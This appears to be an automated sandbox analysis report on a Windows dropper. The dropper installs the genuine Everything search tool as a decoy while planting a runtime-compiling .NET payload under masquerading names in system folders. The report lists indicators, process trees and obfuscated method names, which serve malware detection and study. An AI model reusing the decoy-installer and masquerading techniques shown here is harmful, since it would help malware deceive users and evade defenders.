                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeWindow detected: I &AgreeCancelEverything 1.4.1.1024 (x64) Setup Everything 1.4.1.1024 (x64) SetupLicense AgreementPlease review the license terms before installing Everything.Press Page Down to see the rest of the agreement.EverythingCopyright (c) 2023 voidtoolsPermission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files (the "Software") to deal in the Software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and/or sell copies of the Software and to permit persons to whom the Software is furnished to do so subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND EXPRESS OR IMPLIED INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM DAMAGES OR OTHER LIABILITY WHETHER IN AN ACTION OF CONTRACT TORT OR OTHERWISE ARISING FROM OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Perl-Compatible Regular ExpressionsCopyright (c) 1997-2012 University of CambridgeRedistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met:* Redistributions of source code must retain the above copyright notice this list of conditions and the following disclaimer.* Redistributions in binary form must reproduce the above copyright notice this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.* Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT INDIRECT INCIDENTAL SPECIAL EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE DATA OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY WHETHER IN CONTRACT STRICT LIABILITY OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Everything.
                                Source: C:\Windows\System32\conhost.exeWindow detected: I &AgreeCancelEverything 1.4.1.1024 (x64) Setup Everything 1.4.1.1024 (x64) SetupLicense AgreementPlease review the license terms before installing Everything.Press Page Down to see the rest of the agreement.EverythingCopyright (c) 2023 voidtoolsPermission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files (the "Software") to deal in the Software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and/or sell copies of the Software and to permit persons to whom the Software is furnished to do so subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND EXPRESS OR IMPLIED INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM DAMAGES OR OTHER LIABILITY WHETHER IN AN ACTION OF CONTRACT TORT OR OTHERWISE ARISING FROM OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.Perl-Compatible Regular ExpressionsCopyright (c) 1997-2012 University of CambridgeRedistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met:* Redistributions of source code must retain the above copyright notice this list of conditions and the following disclaimer.* Redistributions in binary form must reproduce the above copyright notice this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.* Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT INDIRECT INCIDENTAL SPECIAL EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING BUT NOT LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE DATA OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY WHETHER IN CONTRACT STRICT LIABILITY OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Everything.
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\EverythingJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Changes.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\License.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.lngJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Uninstall.exeJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeDirectory created: C:\Program Files\Everything\Everything.ini.tmpJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDirectory created: c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDirectory created: c:\Program Files\Everything\Everything.exe
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EverythingJump to behavior
                                Source: wxl1r0lntg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: wxl1r0lntg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: wxl1r0lntg.exeStatic file information: File size 11304960 > 1048576
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dllJump to behavior
                                Source: wxl1r0lntg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xac5000
                                Source: wxl1r0lntg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, sqls211.exe, 00000002.00000000.2037410745.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, sqls211.exe, 00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmp, sqls211.exe, 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, sqls211.exe, 00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdb source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.pdb source: containerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: winload_prod.pdb0 source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winload_prod.pdb source: Everything.exe, 00000014.00000003.2341196360.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2342771150.0000000005881000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdbl source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntkrnlmp.pdb, source: Everything.exe, 00000014.00000003.2331201128.0000000005D51000.00000004.00000020.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.cs.Net Code: Type.GetTypeFromHandle(k9dqKXfCa42FxuEe0CP.c4CGwqcwPBu(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(k9dqKXfCa42FxuEe0CP.c4CGwqcwPBu(16777245)),Type.GetTypeFromHandle(k9dqKXfCa42FxuEe0CP.c4CGwqcwPBu(16777259))})
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D61DDE0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00007FF63D61DDE0
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeFile created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\__tmp_rar_sfx_access_check_4343828Jump to behavior
                                Source: Uninstall.exe.3.drStatic PE information: real checksum: 0x1d5127 should be: 0x253d3
                                Source: LangDLL.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x91a8
                                Source: containerwebruntime.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x1f6560
                                Source: sqls211.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2497f8
                                Source: System.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x3d68
                                Source: Everything.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x5d3a
                                Source: Uninstall.exe.6.drStatic PE information: real checksum: 0x1d5127 should be: 0x253d3
                                Source: KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x1f6560
                                Source: InstallOptions.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x7de9
                                Source: RuntimeBroker.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x1f6560
                                Source: sqls211.exe.0.drStatic PE information: section name: .didat
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDF640 push ecx; ret 2_2_00CDF653
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDEB78 push eax; ret 2_2_00CDEB96
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeCode function: 14_2_00007FF848D24B8F push eax; retf 14_2_00007FF848D24B95
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 69_2_00007FF848D04B8F push eax; retf 69_2_00007FF848D04B95
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 69_2_00007FF848D2CF4C pushad ; ret 69_2_00007FF848D2CF4D
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D14B8F push eax; retf 70_2_00007FF848D14B95
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D3CF4C pushad ; ret 70_2_00007FF848D3CF4D
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D38148 push ebx; ret 73_2_00007FF848D3816A
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D38108 push ebx; ret 73_2_00007FF848D3816A
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D380F0 push ebx; ret 73_2_00007FF848D3816A
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D195B6 push esi; retf 73_2_00007FF848D195B9
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D2CF4C pushad ; ret 73_2_00007FF848D2CF4D
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D04B8F push eax; retf 73_2_00007FF848D04B95
                                Source: containerwebruntime.exe.2.drStatic PE information: section name: .text entropy: 7.577226279253419
                                Source: KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe.14.drStatic PE information: section name: .text entropy: 7.577226279253419
                                Source: RuntimeBroker.exe.14.drStatic PE information: section name: .text entropy: 7.577226279253419
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, qeuHZuGwwZ9OEfG27Z9.csHigh entropy of concatenated method names: 'lqpGUuiJDJ', 'aFiGdUbqXC', 'YFDGhuFZdP', 'fuuGr18LXX', 'YKgNKvRbSu2vWl4pS4Yt', 'HY0pa8Rbt0G8WCibPNGH', 'pmKyMvRbC6Ov5exngeOC', 'mZgqVsRbmq10XEn3vAtA', 'ixDV0ORbIhntTgmTZUw1'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, hT9twyRCXlrCO6BL0kY.csHigh entropy of concatenated method names: 'BBBRmDrlDh', 'w0dRIiPJTl', 'nKXRZrjxfJ', 'gXgDy9RLZjPgdp14CPDv', 'RCcpkmRLoyS4Qe4jiUWN', 'f8saYPRLpnCX95Kxi3xE', 'crHDedRLxQI2bWWqF6oy', 'Hr9htZRLiBR8j6Vtu4e4', 'pMRrC7RLYPVpEvdFtGds'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, FbsaNfxCS3UpuPFDGPo.csHigh entropy of concatenated method names: 'aXaxxkIcjk', 'TwV6NFRk7hApApiu5RZS', 'aTOpshRkMGyBBaVw35QJ', 'zo2mvmRkFyV4xB5xrMv0', 'hFTVTIRkOQjHHraSo8pp', 'd35xmysmHr', 'JZ3KPwRkV6RY4COaic7M', 'GbYlVrRkDrqBcLDWSfM7', 'DgSlKwRk8NncGvaPiw9e', 'NuySJxRkBNGZ8qSAUDfh'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, xfy06PRK2S6IU3G79VM.csHigh entropy of concatenated method names: 'P9X', 'I5IR0pOhxO', 'g0NRdTOqna0', 'imethod_0', 'xr7RjyGaDA', 'aR63EMRLjTBMbkajAll9', 'ag2y1ERLvgxDIZXmNSPN', 'KHB3k3RLECpxGgriAfrc', 'ya3VcsRL0ffGOThN4aMV', 'RwpWphRLfGlZWNL544iM'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, CLWoalK2nHr6905njYP.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'lOMKltiVtk', 'yjZ7dcR01bseZVJZw6FC', 'n4GX2sR0Duv5xsbwnWt2', 'E8TvGoR08AuoijQiPvP2', 'Ahu4FUR0VnEpuX0oefoK', 'wJlMmsR0B20hWqWAhMA0', 'JGWkMkR0NRd0wOTM5AXC'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, OWo3O56eIKWaR7dVFdS.csHigh entropy of concatenated method names: 'zxm6tKJrai', 'OcY6CjfWj3', 'jng6SmauV8', 'T0g6mtqbCx', 'eKS6IhPE7J', 'LtW223RVCt4xBUKP2h5M', 'qE6KcGRVAbGi4KJHpb0U', 'Ydg8tkRVtvUDkQYOcrei', 'ig1pknRVSvqWL2VjWbBj', 'QOII7kRVm389sSKl3Jx6'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, VKd9s5fn7Z9i6vF76DM.csHigh entropy of concatenated method names: 'q4SRugV4eh3', 'VpRRulbjF8p', 'GyyRu4Sn9E6', 'emqRusbKqES', 'zn1Rucf1o43', 't2DRuq6sIfV', 'ALERu9MmDJS', 'jmCJwIA0sQ', 'oPXRunE385M', 'EK5RukyTupe'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, wiTAr9hC795iLUIB6Qt.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'nTLnkARsnyjSiWUXEaSO', 'zKdHb8Rsk381k9UnfidM', 'YRatXmRs3xVdxSiUQiFf', 'DUmq20Rs1clSFPenlCON'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, VcKpbIbVvR1LYB4rpHT.csHigh entropy of concatenated method names: 'X1wbNeyvMR', 'cWpbFkTMWL', 'FXObOuPZFb', 'dMnYkIRBqBiUGGjDjY4j', 'X6VrMgRB9chHvHst6UCW', 'n5KChuRBntxDEt338i7K', 'tcHK0hRBkDDlnRwZhRW4', 'rx3svmRB3tV5JYcDRx6f', 'O5f9b5RB1efEwtJoKXOd', 'd4MaRbRBDygPmqT1aKKv'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, HY3Rh6dLrUngIqhNr5n.csHigh entropy of concatenated method names: 'EIydQ1JRK0', 'wHfdXVAJkh', 'mnJd2bKeyU', 'vwndg23cjC', 'VaodlmgPgy', 'gDCd4FUIBV', 'vpwdAER4KUBfOqv3FqVg', 'CSABFSR4EqnCJtJQ1pQD', 'IiFFVdR40pxq97Qqwf3B', 't2bWx0R4jeHYtul8Dush'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, UQsQ1olOSrfhYBb2gdh.csHigh entropy of concatenated method names: 'KvSlME57Q1', 'k6r', 'ueK', 'QH3', 'MaZlKaVqK2', 'Flush', 'UgRlEEVKXg', 'evVl0Nkvbb', 'Write', 'weTljsVrLJ'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, paSXwpdYo82Ge65akBR.csHigh entropy of concatenated method names: 'maMdH3lSKD', 'Jvvd9dR4kAstm7KOVTXU', 'JrW0xaR43JJov4Yd5M8R', 'Fy5lnYR41FNjTRB5GQ7j', 'VRAsSgR4D3cLUj1AMcE7', 'FKB2RFR48vMfpsubhYDc', 'KR8qlsR49M0Ni87yZK9a', 'NO5q19R4n8wdB3BRsX65', 'CMH7OGR4VBZOeU2YpDIV'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, AA6C8rhGJOWKYZKWYnI.csHigh entropy of concatenated method names: 'IFMh5V0WK2', 'SvXhwZNZiO', 'FE5huQhtbO', 's6vhUXjDI3', 'VY3hdyQ3P8', 'q2khhOhCaF', 'Q0chrgBaGG', 'PvZheMRpqX', 'vxJhAd5a9e', 'MS0htkuYTd'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, R68m7un2CwBXnXKWZ0B.csHigh entropy of concatenated method names: 'VtOnlGoAMg', 'EqTn4ANSgs', 't4LnshdBxq', 'pO6ncKR3XI', 'Sj2nqajMYY', 'NGJn97SaEn', 'H29nnssauu', 'iRlnkVKqxL', 'lCKn3da7I3', 'N5wn1gcBr4'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, oLPoVxURj6u8SGEuM0R.csHigh entropy of concatenated method names: 'SP5UaQNgw8', 'TtnU5ql4wD', 'fDjUwH9dQ2', 'dBPR3ORld7TB38D3iljd', 'xhJoQsRluchhVIUnKZV6', 'jE9avrRlUm4kFIgFPJxZ', 'nqEf1NRlhfUvmuixZwBW', 'UHrDF6RlrHdrPMIfp7oP', 'SuKSnPRle3c4LEXQaPbr', 'er5IVMRlA470x8oGhJHV'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, M61waZw7grKVqLaUHpo.csHigh entropy of concatenated method names: 'aVNwvRpOJE', 'MTBwfWMtx9', 'FePwJlVsyC', 'AVGwz7jYoI', 'j4ZuT9FsxR', 'kpMuR0y3Hm', 'xDZuGa6ibU', 'FE2J3nRgZonxISFqmDyk', 'dbT7mNRgoe5G2vGvTBuu', 'WfSucXRgmaEBh4EdZO4u'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, QbJE3FwmtDjv08ESvaN.csHigh entropy of concatenated method names: 'qxawL3hhtj', 'yQ9wb5saTY', 'CHZwQP9tUs', 'BnNEZXR2DffgSbrpQxwa', 'maFHjoR28hPY0IsquJ3P', 'z5AARmR23Xe77ZoihqmI', 'tAOOtcR21DZjFGobXpcD', 'BoAwHKYC4O', 'B4rwPdOXoI', 'UVREXcR2nNI3wUZlgeRC'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, bx4lYDuP9EfKMOyBVht.csHigh entropy of concatenated method names: 'eCLu2G1HAm', 'FBdDJWRgkahyIPIGauCL', 'AcxlOFRg9nLiq8uwywtM', 'dAM57YRgndfQdFblsEMS', 'PZcSUlRg3DM1qYJkOX8W', 'E94', 'P9X', 'vmethod_0', 'q6vR5xtTaTs', 'M7JRdhS3dgd'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, GcnAQeu3NuuMX7TjXF1.csHigh entropy of concatenated method names: 'JYku041ptM', 'nN6ujjieQI', 'FMguvIWQVU', 'rylaLTRlalMdPSjeA8yM', 'SbnWdQRl5PnUKHoivwvv', 'sG3jWZRlRCLtlFZeUBKb', 'SteOW6RlGpw8FU4v4fmW', 'MGduD1n1hU', 'GBtu8ofQkQ', 'zf1uVOsmEL'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, SYTk36QkTfYDr1ulPa9.csHigh entropy of concatenated method names: 'mL7Q1kHgWv', 'BFfQDXWe2R', 'ESoQ8yjQYu', 'dVuQV0nw4f', 'WceQBaLnxf', 'rJOQNVtgfT', 'SvjQFHyOI2', 'bqGQOfGHrF', 'pQ3Q7Wi3G2', 'SZlQMRkCDe'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, FQtZLXgiyIV9gpqIndy.csHigh entropy of concatenated method names: 'cQolC82Z1o', 'PDd2DXRON1eXbyjQUMoT', 'iXJimYROVoED1wMhQY8V', 'gRGv3yROBFa9W484xlhL', 'mfBYLVROFTI1Ze7NFbE6', 'kt5', 'g2jgWxUYgp', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, UIOCGDw4STOKKvT0y6j.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'gv4R5eOy9Kb', 'ra3wcW7wWv', 'imethod_0', 'kAiSZZR2BZ6YB3kcxTYi', 'CpHdTCR2NNgtX3tAqyGC', 'YA5bdWR2FIPVnbYnkOn9', 'Nj9UpZR2OXKIyyCbaiLN'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, f6Jwf4UpItG2KEqAyiS.csHigh entropy of concatenated method names: 'VgEUb6RMBk', 'eLIEn9Rl3quwPncWe5ge', 'rXdnrxRlns88MtSO5rC3', 'TIVLNnRlkQfbIsxdITR9', 'HU8kuaRl1lOHPLaxLjeK', 'OiTT2mRlDrFq9s9Y8O42', 'KNmUybRl81927h9MftOm', 'AryUifxeQW', 'icDUYsNBNr', 'h2lUWyuswe'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, ngDRGCDkkehTNyf9PH.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'EAxVEaeE5'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jAE4UDimH8HViU6dTep.csHigh entropy of concatenated method names: 'e2VcTBR1IANsd7ubYTSA', 'O8m3GiR1ZgdMQjGiNunk', 'WIxPUuR1o40n1UPaIW85', 'R81coDR1SBeADUvImGQe', 'lNfk4lR1m7snxuOsgL8l', 'method_0', 'method_1', 'FnOiZIxPTb', 'EFBioFVimO', 'o34ipiTbDl'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, j4nIM6RJR6LoMxgZWBo.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'oE9RdRUyb0c', 'ScUR5Ro7u2g', 'OyFjpkRbTXgaWfZ0w1eF', 'D0XZJyRbR4YxSxNHXHX2', 'n7QXiqRbGgwto9QyyeCQ', 'fTSSxARba7cC5em4Sfwr'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, IHyZvkHrm012RH7kaZ7.csHigh entropy of concatenated method names: 'PFXH2X67Hm', 'TWxHA9ktUN', 'zR6HtCrTRS', 'pAmHCpr5Hi', 'JHqHS0wxO5', 'RALHmyorTE', 'PviHI2Ah0H', 'sCpHZjxPcg', 'ceWHo5uwgH', 'L2jHpQ8UOh'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jFLCT192cY8B7tjaoJ3.csHigh entropy of concatenated method names: 'XfA9lC6WBk', 'bPc94HQCD3', 'aq09sFNkX3', 'Eeo9cJjxNW', 'f5F9qYs4Fx', 'Dhh99kmhOq', 'oQY9nSH6QI', 'qRe9k4BGAA', 'jiC93nB5f2', 'G9a91uN00c'
